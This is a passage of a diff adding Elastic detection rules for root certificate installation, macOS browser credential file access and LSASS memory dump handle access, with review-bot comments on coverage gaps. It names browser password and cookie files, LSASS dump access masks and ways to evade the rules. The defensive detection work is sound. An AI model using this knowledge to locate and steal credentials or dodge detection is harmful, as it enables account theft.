"T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "202829f6-0271-4e88-b882-11a655c590d4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json new file mode 100644 index 00000000000..edd1eab3628 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json 
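Review bot: The `process.name : ("kworker*", "kthread*")` pattern only matches names that start with the bare kernel-thread name, while the masquerading style described in the referenced Sandfly post (and the usual attacker trick) is to mimic how `ps` displays kernel threads, i.e. `[kworker/0:1]` with brackets; if Elastic Defend derives `process.name` from the process's comm/argv rather than the executable basename, that form would not match. Widening the pattern is a one-line change: `process.name : ("kworker*", "kthread*", "[kworker*", "[kthread*")` — worth confirming which field population applies before shipping. Also, `endgame-*` is in `index` and "Data Source: Elastic Endgame" is in `tags`, but `related_integrations` only lists `endpoint`, so the package metadata understates the rule's data sources.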
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n 
\"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json new file mode 100644 index 00000000000..4c92a7dbb60 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n 
\"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json new file mode 100644 index 00000000000..980e5d0d6ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json 
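Review bot: The `registry.path` list in the query covers only machine-wide stores (`HKLM\\...` and `\\REGISTRY\\MACHINE\\...` Root/AuthRoot), so a certificate added to the current user's root store — which needs no admin rights — is not seen, even though the description claims to identify "the creation or modification of a local trusted root certificate". If per-user coverage is wanted, add patterns such as `"HKEY_USERS\\*\\Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\*\\Blob"` (and the `\\REGISTRY\\USER\\*` form, depending on how the data source renders user hives), accepting that this will need its own tuning. Separately, the `not process.executable` exclusions trust `?:\\Program Files\\*.exe`, `?:\\Program Files (x86)\\*.exe`, `?:\\Windows\\System32\\*.exe` and `?:\\Windows\\WinSxS\\*.exe` by path alone; an actor who already holds the admin rights needed to write HKLM can drop or copy a binary into those directories, so the `false_positives` text should state that these exceptions are a noise trade-off rather than a safe boundary. The `_110` content appears identical to the `_109` file above apart from the version fields, so both versions carry the same gap.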
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to known browser files that store passwords and cookies. Adversaries may acquire credentials from web browsers by reading files specific to the target browser.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access of Stored Browser Credentials", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\",\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\",\n \"/Users/*/Library/Application Support/Google/Chrome/Profile*/Cookies\",\n \"/Users/*/Library/Cookies*\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\",\n \"Login Data\",\n \"Cookies.binarycookies\",\n \"key4.db\",\n \"key3.db\",\n \"logins.json\",\n \"cookies.sqlite\"\n ) and \n not (process.name : \"wordexp-helper\" and process.parent.name : (\"elastic-agent\", \"elastic-endpoint\"))\n", + "references": [ + "https://securelist.com/calisto-trojan-for-macos/86543/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", + "setup": "## 
Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.003", + "name": "Credentials from Web Browsers", + "reference": "https://attack.mitre.org/techniques/T1555/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "20457e4f-d1de-4b92-ae69-142e27a4342a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json new file mode 100644 index 00000000000..cb68a85a413 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json 
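Review bot: The Firefox patterns in the query match only profile directories ending in `.default` (`.../Firefox/Profiles/*.default/cookies.sqlite`, `.../*.default/key*.db`, `.../*.default/logins.json`), while current Firefox releases create the profile as `<id>.default-release`, so a full-path argument into such a profile would not match unless the bare-filename entries (`logins.json`, `cookies.sqlite`, `key4.db`) happen to be passed as a separate argument. Changing those three patterns to `*.default*/`, e.g. `"/Users/*/Library/Application Support/Firefox/Profiles/*.default*/logins.json"`, would cover both layouts. Likewise Chrome `Login Data` is listed only under `Default/`, whereas `Cookies` is listed for both `Default/` and `Profile*/`; adding `"/Users/*/Library/Application Support/Google/Chrome/Profile*/Login Data"` keeps the two consistent. The rule is `severity: high` with `risk_score: 73` yet has no `note` investigation guide and no `false_positives` entry, so a short note about backup and sync tools that legitimately reference these files would help triage.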
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) object access with specific access masks that many tools with a capability to dump memory to disk use (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic as it has been validated against a host of various LSASS dump tools such as SharpDump, Procdump, Mimikatz, Comsvcs etc. It detects this behavior at a low level and does not depend on a specific tool or dump file name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Handle Access", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by 
the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
